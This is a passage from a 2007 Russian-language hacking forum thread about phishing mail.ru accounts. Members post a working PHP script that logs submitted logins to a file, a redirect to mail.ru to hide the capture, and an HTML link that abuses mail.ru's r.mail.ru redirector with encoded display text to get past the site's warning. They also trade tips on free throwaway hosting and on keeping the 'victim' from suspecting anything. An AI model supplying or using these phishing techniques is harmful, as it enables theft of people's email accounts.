Разоблачение http://mai1.pp.ru/ + ещё один общедоступный метод взлома @ mail

Discussion in 'Уязвимости Mail-сервисов' started by Dronga, 25 Feb 2007.

  1. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    PHP:
    echo("Системная ошибка");
    допустим замени на
    PHP:
    Header("Location: http://mail.ru");
    mail.ru -- куда будет перекидывать пользователя.
     
    2 people like this.
  2. Bayazid

    Bayazid Banned

    Joined:
    26 Nov 2005
    Messages:
    141
    Likes Received:
    24
    Reputations:
    -2
    Не подскажете как закодировали?
    И ещё как в майл.ру http://img440.imageshack.us/my.php?image=39392793ap2.gif вставляете картинки в текст?
    Кинь пожалуйста в личку то, что удалено, если нетрудно.
     
    #42 Bayazid, 13 Mar 2007
    Last edited by a moderator: 13 Mar 2007
  3. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Закодировано при помощи charackter encoding calculator. Это урл значение.
    Ресурс с калькулятором здесь, в самом низу http://ha.ckers.org/xss.html
     
    #43 Constantine, 13 Mar 2007
    Last edited: 13 Mar 2007
    2 people like this.
  4. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Или просто скачать старый добрый InetCrack от Algola http://old.antichat.ru/inetcrack/ В любом случае, не лишняя программка.
     
    #44 Dronga, 14 Mar 2007
    Last edited: 14 Mar 2007
  5. back0rifice

    back0rifice Active Member

    Joined:
    16 Mar 2006
    Messages:
    327
    Likes Received:
    106
    Reputations:
    19
    Статья порадовала, СПС!
    ВОТ!!! Вот этот постулат надо повесить в заголовке каждого раздела и разместить у каждого в профиле!!! А то скулёж из серии "хачу мыла, паламайте" уже настигает!!!
    Подпишусь под каждым словом! Dronga, za4ёt :) !
     
  6. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Не один такой умный, уже все давно сделано ;)
     
  7. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    Способ который использует mai1.pp.ru сейчас не прокатит на mail.ru. При нажатии на ссылку которая ведёт на другой ресурс появляется табличка, "Вы уверены, что хотите покинуть почтовый ящик и перейти на внешний ресурс: http://razvod-lamerov.narod.ru?". Но ссылки вида *.mail.ru/.../.../.../www.razvod-lamerov.narod.ru работают без этих сообщений)))
     
    1 person likes this.
  8. xe0n2

    xe0n2 New Member

    Joined:
    6 Jan 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Подскажите, пожалуйста: Если имя текстового поля, которое надо записать Login, то куда его нужно подставлять в этом скрипте? и будет ли этого скрипта достаточно чтобы данные записались в log.php

    <?php
    $username=$_GET['username'];
    if (isset($username))
    {
    $log_path="./log.php";
    $log_string=$username." ";
    $file=fopen($log_path,"a");
    fwrite($file, $log_string, strlen($log_string));
    fclose($file);
    }
    ?>
     
  9. FindeR

    FindeR Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    623
    Likes Received:
    138
    Reputations:
    20
    xe0n2
    PHP:
    <?php
    $Login
    =$_GET['Login'];
    if (isset(
    $Login))
    {
    $log_path="./log.php";
    $log_string=$Login." ";
    $file=fopen($log_path,"a");
    fwrite($file$log_stringstrlen($log_string));
    fclose($file);
    }
    ?>
     
  10. xe0n2

    xe0n2 New Member

    Joined:
    6 Jan 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Поясните, пожалуйста, каким образом нужно писать ссылку, чтобы обойти эту табличку мейл.рушную?
     
  11. xe0n2

    xe0n2 New Member

    Joined:
    6 Jan 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    со ссылкой разобрался, но закодированная ссылка вида http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F почему то не работает. (пишет сервер не найден)
     
  12. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Потому что кодировка пишется после адреса на каторый перекидывает,
    Пиши так http://r.mail.ru/cln2863/www.ya.ru
    и отсылай письмо с помощью хтмл, а там я надеюсь ты знаеш как визуально адрес изменить
    Code:
    <a herf=http://r.mail.ru/cln2863/www.ya.ru>http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F </a>
    и будет счатя, я так обошел ;)
     
  13. v0rm

    v0rm New Member

    Joined:
    31 Mar 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Кодированные линки не будут работать в Internet Explorer 7.0 , на сайте microsoft-а читал, такую мазу они ввели видимо из соображений безопасности...
    так что ребята, облом с URL-кодировой...
     
  14. ground_zero

    ground_zero Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    398
    Likes Received:
    85
    Reputations:
    5
    http://ha.ckers.org/xss.html
     
  15. sacron

    sacron Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    89
    Likes Received:
    0
    Reputations:
    0
    B** почитал здесь весь ваш базар,но так и не понял главного или пропустил читая,кто-нибудь хоть знает как зашифровать сам линк,появляющийся в строке адреса,когда страница по ссылке уже открыта,а то я уже заё*** светить свой хост при переходе на подставную страницу
     
    #55 sacron, 31 Mar 2007
    Last edited by a moderator: 4 Apr 2007
  16. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    А вот там уже нельзя, потому и рег левый бесплатный хост
     
    #56 Petr, 3 Apr 2007
    Last edited by a moderator: 4 Apr 2007
    1 person likes this.
  17. xAntifa_GuYx

    xAntifa_GuYx Elder - Старейшина

    Joined:
    10 Mar 2007
    Messages:
    37
    Likes Received:
    12
    Reputations:
    1
    А почему бы не сделать чтоб страница открывалась во весь экран, без строки?? Как на порно сайтах делают :D :D
     
  18. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Ни у всех ie :\ а уже что то даже на движке ие отоброжает адрестную строку! и вообще помните что малейшие различии от оригинала могут повергуть в сомнения жертву
     
  19. BUTUZ

    BUTUZ New Member

    Joined:
    26 Jan 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0

    а мона в Личку получить удалённый скриптик?
     
  20. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Так же, как и интернет...
    Лежал где-то в сети кряк интернета - попробуй
     
    #60 Basurman, 7 Jun 2007
    Last edited: 7 Jun 2007